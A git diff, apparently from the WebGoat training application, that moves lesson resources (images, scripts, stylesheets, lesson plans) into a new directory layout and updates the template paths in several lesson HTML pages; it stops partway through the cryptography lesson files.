diff --git a/webgoat-lessons/challenge/src/main/resources/html/Challenge1.html b/src/main/resources/lessons/challenges/html/Challenge1.html
similarity index 95%
rename from webgoat-lessons/challenge/src/main/resources/html/Challenge1.html
rename to src/main/resources/lessons/challenges/html/Challenge1.html
index 0f1d32fc9..f69942f38 100644
--- a/webgoat-lessons/challenge/src/main/resources/html/Challenge1.html
+++ b/src/main/resources/lessons/challenges/html/Challenge1.html
@@ -3,7 +3,7 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:Challenge_introduction.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/challenges/documentation/Challenge_introduction.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
     <div class="attack-container">
@@ -60,4 +60,4 @@
 </div>
 
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/challenge/src/main/resources/html/Challenge5.html b/src/main/resources/lessons/challenges/html/Challenge5.html
similarity index 97%
rename from webgoat-lessons/challenge/src/main/resources/html/Challenge5.html
rename to src/main/resources/lessons/challenges/html/Challenge5.html
index 286bb6876..9a6f42348 100644
--- a/webgoat-lessons/challenge/src/main/resources/html/Challenge5.html
+++ b/src/main/resources/lessons/challenges/html/Challenge5.html
@@ -4,7 +4,7 @@
 
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:Challenge_5.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/challenges/documentation/Challenge_5.adoc"></div>
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/challenge6.css}"/>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -87,4 +87,4 @@
     </div>
 </div>
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/challenge/src/main/resources/html/Challenge6.html b/src/main/resources/lessons/challenges/html/Challenge6.html
similarity index 98%
rename from webgoat-lessons/challenge/src/main/resources/html/Challenge6.html
rename to src/main/resources/lessons/challenges/html/Challenge6.html
index d6e174e20..1a906c0a6 100644
--- a/webgoat-lessons/challenge/src/main/resources/html/Challenge6.html
+++ b/src/main/resources/lessons/challenges/html/Challenge6.html
@@ -4,7 +4,7 @@
 
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:Challenge_6.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/challenges/documentation/Challenge_6.adoc"></div>
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/challenge6.css}"/>
     <script th:src="@{/lesson_js/challenge6.js}" language="JavaScript"></script>
     <div class="attack-container">
@@ -120,4 +120,4 @@
     </div>
 </div>
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/challenge/src/main/resources/html/Challenge7.html b/src/main/resources/lessons/challenges/html/Challenge7.html
similarity index 97%
rename from webgoat-lessons/challenge/src/main/resources/html/Challenge7.html
rename to src/main/resources/lessons/challenges/html/Challenge7.html
index 0bf8601fb..dec4331b1 100644
--- a/webgoat-lessons/challenge/src/main/resources/html/Challenge7.html
+++ b/src/main/resources/lessons/challenges/html/Challenge7.html
@@ -12,7 +12,7 @@ f94008f801fceb8833a30fe56a8b26976347edcf First version of WebGoat Cloud website
 
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:Challenge_7.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/challenges/documentation/Challenge_7.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <div class="container-fluid">
@@ -78,4 +78,4 @@ f94008f801fceb8833a30fe56a8b26976347edcf First version of WebGoat Cloud website
     </div>
 </div>
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/challenge/src/main/resources/html/Challenge8.html b/src/main/resources/lessons/challenges/html/Challenge8.html
similarity index 99%
rename from webgoat-lessons/challenge/src/main/resources/html/Challenge8.html
rename to src/main/resources/lessons/challenges/html/Challenge8.html
index efaed5c85..989977d2d 100644
--- a/webgoat-lessons/challenge/src/main/resources/html/Challenge8.html
+++ b/src/main/resources/lessons/challenges/html/Challenge8.html
@@ -3,7 +3,7 @@
 
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:Challenge_8.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/challenges/documentation/Challenge_8.adoc"></div>
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/challenge8.css}"/>
     <script th:src="@{/lesson_js/challenge8.js}" language="JavaScript"></script>
 
@@ -252,4 +252,4 @@
     </div>
 </div>
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/challenge/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/challenges/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/challenges/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/challenge/src/main/resources/images/avatar1.png b/src/main/resources/lessons/challenges/images/avatar1.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/avatar1.png
rename to src/main/resources/lessons/challenges/images/avatar1.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/boss.jpg b/src/main/resources/lessons/challenges/images/boss.jpg
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/boss.jpg
rename to src/main/resources/lessons/challenges/images/boss.jpg
diff --git a/webgoat-lessons/challenge/src/main/resources/images/challenge1-small.png b/src/main/resources/lessons/challenges/images/challenge1-small.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/challenge1-small.png
rename to src/main/resources/lessons/challenges/images/challenge1-small.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/challenge1.png b/src/main/resources/lessons/challenges/images/challenge1.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/challenge1.png
rename to src/main/resources/lessons/challenges/images/challenge1.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/challenge2-small.png b/src/main/resources/lessons/challenges/images/challenge2-small.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/challenge2-small.png
rename to src/main/resources/lessons/challenges/images/challenge2-small.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/challenge2.png b/src/main/resources/lessons/challenges/images/challenge2.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/challenge2.png
rename to src/main/resources/lessons/challenges/images/challenge2.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/challenge3-small.png b/src/main/resources/lessons/challenges/images/challenge3-small.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/challenge3-small.png
rename to src/main/resources/lessons/challenges/images/challenge3-small.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/challenge3.png b/src/main/resources/lessons/challenges/images/challenge3.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/challenge3.png
rename to src/main/resources/lessons/challenges/images/challenge3.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/challenge4-small.png b/src/main/resources/lessons/challenges/images/challenge4-small.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/challenge4-small.png
rename to src/main/resources/lessons/challenges/images/challenge4-small.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/challenge4.png b/src/main/resources/lessons/challenges/images/challenge4.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/challenge4.png
rename to src/main/resources/lessons/challenges/images/challenge4.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/challenge5-small.png b/src/main/resources/lessons/challenges/images/challenge5-small.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/challenge5-small.png
rename to src/main/resources/lessons/challenges/images/challenge5-small.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/challenge5.png b/src/main/resources/lessons/challenges/images/challenge5.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/challenge5.png
rename to src/main/resources/lessons/challenges/images/challenge5.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/hi-five-cat.jpg b/src/main/resources/lessons/challenges/images/hi-five-cat.jpg
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/hi-five-cat.jpg
rename to src/main/resources/lessons/challenges/images/hi-five-cat.jpg
diff --git a/webgoat-lessons/challenge/src/main/resources/images/user1.png b/src/main/resources/lessons/challenges/images/user1.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/user1.png
rename to src/main/resources/lessons/challenges/images/user1.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/user2.png b/src/main/resources/lessons/challenges/images/user2.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/user2.png
rename to src/main/resources/lessons/challenges/images/user2.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/user3.png b/src/main/resources/lessons/challenges/images/user3.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/user3.png
rename to src/main/resources/lessons/challenges/images/user3.png
diff --git a/webgoat-lessons/challenge/src/main/resources/images/webgoat2.png b/src/main/resources/lessons/challenges/images/webgoat2.png
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/images/webgoat2.png
rename to src/main/resources/lessons/challenges/images/webgoat2.png
diff --git a/webgoat-lessons/challenge/src/main/resources/js/bootstrap.min.js b/src/main/resources/lessons/challenges/js/bootstrap.min.js
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/js/bootstrap.min.js
rename to src/main/resources/lessons/challenges/js/bootstrap.min.js
diff --git a/webgoat-lessons/challenge/src/main/resources/js/challenge6.js b/src/main/resources/lessons/challenges/js/challenge6.js
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/js/challenge6.js
rename to src/main/resources/lessons/challenges/js/challenge6.js
diff --git a/webgoat-lessons/challenge/src/main/resources/js/challenge8.js b/src/main/resources/lessons/challenges/js/challenge8.js
similarity index 100%
rename from webgoat-lessons/challenge/src/main/resources/js/challenge8.js
rename to src/main/resources/lessons/challenges/js/challenge8.js
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_Assignment.adoc b/src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_Assignment.adoc
similarity index 100%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_Assignment.adoc
rename to src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_Assignment.adoc
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_Assignment_Network.adoc b/src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_Assignment_Network.adoc
similarity index 100%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_Assignment_Network.adoc
rename to src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_Assignment_Network.adoc
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_console.adoc b/src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_console.adoc
similarity index 100%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_console.adoc
rename to src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_console.adoc
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_elements.adoc b/src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_elements.adoc
similarity index 100%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_elements.adoc
rename to src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_elements.adoc
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_intro.adoc b/src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_intro.adoc
similarity index 100%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_intro.adoc
rename to src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_intro.adoc
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_sources.adoc b/src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_sources.adoc
similarity index 100%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_sources.adoc
rename to src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_sources.adoc
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/html/ChromeDevTools.html b/src/main/resources/lessons/chrome_dev_tools/html/ChromeDevTools.html
similarity index 78%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/html/ChromeDevTools.html
rename to src/main/resources/lessons/chrome_dev_tools/html/ChromeDevTools.html
index 9102a5f3e..db4506fa0 100644
--- a/webgoat-lessons/chrome-dev-tools/src/main/resources/html/ChromeDevTools.html
+++ b/src/main/resources/lessons/chrome_dev_tools/html/ChromeDevTools.html
@@ -4,22 +4,22 @@
 
 <!-- 1 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:ChromeDevTools_intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/chrome_dev_tools/documentation/ChromeDevTools_intro.adoc"></div>
 </div>
 
 <!-- 2 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:ChromeDevTools_elements.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/chrome_dev_tools/documentation/ChromeDevTools_elements.adoc"></div>
 </div>
 
 <!-- 3 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:ChromeDevTools_console.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/chrome_dev_tools/documentation/ChromeDevTools_console.adoc"></div>
 </div>
 
 <!-- 4 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:ChromeDevTools_Assignment.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/chrome_dev_tools/documentation/ChromeDevTools_Assignment.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -35,12 +35,12 @@
 
 <!-- 5 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:ChromeDevTools_sources.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/chrome_dev_tools/documentation/ChromeDevTools_sources.adoc"></div>
 </div>
 
 <!-- 6 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:ChromeDevTools_Assignment_Network.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/chrome_dev_tools/documentation/ChromeDevTools_Assignment_Network.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -82,4 +82,4 @@
     </div>
 </div>
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/chrome_dev_tools/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/chrome_dev_tools/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/images/ChromeDev_Console_Clear.jpg b/src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Console_Clear.jpg
similarity index 100%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/images/ChromeDev_Console_Clear.jpg
rename to src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Console_Clear.jpg
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/images/ChromeDev_Console_Ex.jpg b/src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Console_Ex.jpg
similarity index 100%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/images/ChromeDev_Console_Ex.jpg
rename to src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Console_Ex.jpg
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/images/ChromeDev_Elements.jpg b/src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Elements.jpg
similarity index 100%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/images/ChromeDev_Elements.jpg
rename to src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Elements.jpg
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/images/ChromeDev_Elements_CSS.jpg b/src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Elements_CSS.jpg
similarity index 100%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/images/ChromeDev_Elements_CSS.jpg
rename to src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Elements_CSS.jpg
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/images/ChromeDev_Network.jpg b/src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Network.jpg
similarity index 100%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/images/ChromeDev_Network.jpg
rename to src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Network.jpg
diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/images/ChromeDev_Sources.jpg b/src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Sources.jpg
similarity index 100%
rename from webgoat-lessons/chrome-dev-tools/src/main/resources/images/ChromeDev_Sources.jpg
rename to src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Sources.jpg
diff --git a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_availability.adoc b/src/main/resources/lessons/cia/documentation/CIA_availability.adoc
similarity index 100%
rename from webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_availability.adoc
rename to src/main/resources/lessons/cia/documentation/CIA_availability.adoc
diff --git a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_confidentiality.adoc b/src/main/resources/lessons/cia/documentation/CIA_confidentiality.adoc
similarity index 100%
rename from webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_confidentiality.adoc
rename to src/main/resources/lessons/cia/documentation/CIA_confidentiality.adoc
diff --git a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_integrity.adoc b/src/main/resources/lessons/cia/documentation/CIA_integrity.adoc
similarity index 100%
rename from webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_integrity.adoc
rename to src/main/resources/lessons/cia/documentation/CIA_integrity.adoc
diff --git a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_intro.adoc b/src/main/resources/lessons/cia/documentation/CIA_intro.adoc
similarity index 100%
rename from webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_intro.adoc
rename to src/main/resources/lessons/cia/documentation/CIA_intro.adoc
diff --git a/webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_quiz.adoc b/src/main/resources/lessons/cia/documentation/CIA_quiz.adoc
similarity index 100%
rename from webgoat-lessons/cia/src/main/resources/lessonPlans/en/CIA_quiz.adoc
rename to src/main/resources/lessons/cia/documentation/CIA_quiz.adoc
diff --git a/webgoat-lessons/cia/src/main/resources/html/CIA.html b/src/main/resources/lessons/cia/html/CIA.html
similarity index 70%
rename from webgoat-lessons/cia/src/main/resources/html/CIA.html
rename to src/main/resources/lessons/cia/html/CIA.html
index 0a73520be..219ce0e08 100644
--- a/webgoat-lessons/cia/src/main/resources/html/CIA.html
+++ b/src/main/resources/lessons/cia/html/CIA.html
@@ -3,19 +3,19 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:CIA_intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/cia/documentation/CIA_intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:CIA_confidentiality.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/cia/documentation/CIA_confidentiality.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:CIA_integrity.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/cia/documentation/CIA_integrity.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:CIA_availability.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/cia/documentation/CIA_availability.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
@@ -23,7 +23,7 @@
     <link rel="stylesheet" type="text/css" th:href="@{/css/quiz.css}"/>
     <script th:src="@{/js/quiz.js}" language="JavaScript"></script>
     <link rel="import" type="application/json" th:href="@{/lesson_js/questions.json}"/>
-    <div class="adoc-content" th:replace="doc:CIA_quiz.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/cia/documentation/CIA_quiz.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <div class="container-fluid">
@@ -40,4 +40,4 @@
     </div>
 </div>
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/cia/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/cia/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/cia/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/cia/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/cia/src/main/resources/js/questions_cia.json b/src/main/resources/lessons/cia/js/questions_cia.json
similarity index 100%
rename from webgoat-lessons/cia/src/main/resources/js/questions_cia.json
rename to src/main/resources/lessons/cia/js/questions_cia.json
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/css/clientSideFiltering-stage1.css b/src/main/resources/lessons/client_side_filtering/css/clientSideFiltering-stage1.css
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/css/clientSideFiltering-stage1.css
rename to src/main/resources/lessons/client_side_filtering/css/clientSideFiltering-stage1.css
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/css/clientSideFilteringFree.css b/src/main/resources/lessons/client_side_filtering/css/clientSideFilteringFree.css
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/css/clientSideFilteringFree.css
rename to src/main/resources/lessons/client_side_filtering/css/clientSideFilteringFree.css
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_assignment.adoc b/src/main/resources/lessons/client_side_filtering/documentation/ClientSideFiltering_assignment.adoc
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_assignment.adoc
rename to src/main/resources/lessons/client_side_filtering/documentation/ClientSideFiltering_assignment.adoc
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_final.adoc b/src/main/resources/lessons/client_side_filtering/documentation/ClientSideFiltering_final.adoc
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_final.adoc
rename to src/main/resources/lessons/client_side_filtering/documentation/ClientSideFiltering_final.adoc
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_plan.adoc b/src/main/resources/lessons/client_side_filtering/documentation/ClientSideFiltering_plan.adoc
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en/ClientSideFiltering_plan.adoc
rename to src/main/resources/lessons/client_side_filtering/documentation/ClientSideFiltering_plan.adoc
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/html/ClientSideFiltering.html b/src/main/resources/lessons/client_side_filtering/html/ClientSideFiltering.html
similarity index 95%
rename from webgoat-lessons/client-side-filtering/src/main/resources/html/ClientSideFiltering.html
rename to src/main/resources/lessons/client_side_filtering/html/ClientSideFiltering.html
index 8c664388a..e9f3ec18e 100644
--- a/webgoat-lessons/client-side-filtering/src/main/resources/html/ClientSideFiltering.html
+++ b/src/main/resources/lessons/client_side_filtering/html/ClientSideFiltering.html
@@ -2,10 +2,10 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:ClientSideFiltering_plan.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/client_side_filtering/documentation/ClientSideFiltering_plan.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:ClientSideFiltering_assignment.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/client_side_filtering/documentation/ClientSideFiltering_assignment.adoc"></div>
 
     <br/>
 
@@ -74,7 +74,7 @@
     </div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:ClientSideFiltering_final.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/client_side_filtering/documentation/ClientSideFiltering_final.adoc"></div>
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/clientSideFilteringFree.css}"/>
     <script th:src="@{/lesson_js/clientSideFilteringFree.js}" language="JavaScript"></script>
     <div class="attack-container">
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/client_side_filtering/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/client_side_filtering/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/images/lesson1_header.jpg b/src/main/resources/lessons/client_side_filtering/images/lesson1_header.jpg
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/images/lesson1_header.jpg
rename to src/main/resources/lessons/client_side_filtering/images/lesson1_header.jpg
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/images/lesson1_workspace.jpg b/src/main/resources/lessons/client_side_filtering/images/lesson1_workspace.jpg
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/images/lesson1_workspace.jpg
rename to src/main/resources/lessons/client_side_filtering/images/lesson1_workspace.jpg
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/images/samsung-black.jpg b/src/main/resources/lessons/client_side_filtering/images/samsung-black.jpg
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/images/samsung-black.jpg
rename to src/main/resources/lessons/client_side_filtering/images/samsung-black.jpg
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/images/samsung-grey.jpg b/src/main/resources/lessons/client_side_filtering/images/samsung-grey.jpg
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/images/samsung-grey.jpg
rename to src/main/resources/lessons/client_side_filtering/images/samsung-grey.jpg
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/js/clientSideFiltering.js b/src/main/resources/lessons/client_side_filtering/js/clientSideFiltering.js
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/js/clientSideFiltering.js
rename to src/main/resources/lessons/client_side_filtering/js/clientSideFiltering.js
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/js/clientSideFilteringFree.js b/src/main/resources/lessons/client_side_filtering/js/clientSideFilteringFree.js
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/js/clientSideFilteringFree.js
rename to src/main/resources/lessons/client_side_filtering/js/clientSideFilteringFree.js
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/lessonSolutions/en/ClientSideFiltering.html b/src/main/resources/lessons/client_side_filtering/lessonSolutions/en/ClientSideFiltering.html
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/lessonSolutions/en/ClientSideFiltering.html
rename to src/main/resources/lessons/client_side_filtering/lessonSolutions/en/ClientSideFiltering.html
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/lessonSolutions/en/ClientSideFiltering_files/clientside_firebug.jpg b/src/main/resources/lessons/client_side_filtering/lessonSolutions/en/ClientSideFiltering_files/clientside_firebug.jpg
similarity index 100%
rename from webgoat-lessons/client-side-filtering/src/main/resources/lessonSolutions/en/ClientSideFiltering_files/clientside_firebug.jpg
rename to src/main/resources/lessons/client_side_filtering/lessonSolutions/en/ClientSideFiltering_files/clientside_firebug.jpg
diff --git a/webgoat-lessons/crypto/src/main/resources/lessonPlans/en/Crypto_plan.adoc b/src/main/resources/lessons/cryptography/documentation/Crypto_plan.adoc
similarity index 100%
rename from webgoat-lessons/crypto/src/main/resources/lessonPlans/en/Crypto_plan.adoc
rename to src/main/resources/lessons/cryptography/documentation/Crypto_plan.adoc
diff --git a/webgoat-lessons/crypto/src/main/resources/lessonPlans/en/defaults.adoc b/src/main/resources/lessons/cryptography/documentation/defaults.adoc
similarity index 100%
rename from webgoat-lessons/crypto/src/main/resources/lessonPlans/en/defaults.adoc
rename to src/main/resources/lessons/cryptography/documentation/defaults.adoc
diff --git a/webgoat-lessons/crypto/src/main/resources/lessonPlans/en/encoding_plan.adoc b/src/main/resources/lessons/cryptography/documentation/encoding_plan.adoc
similarity index 100%
rename from webgoat-lessons/crypto/src/main/resources/lessonPlans/en/encoding_plan.adoc
rename to src/main/resources/lessons/cryptography/documentation/encoding_plan.adoc
diff --git a/webgoat-lessons/crypto/src/main/resources/lessonPlans/en/encoding_plan2.adoc b/src/main/resources/lessons/cryptography/documentation/encoding_plan2.adoc
similarity index 100%
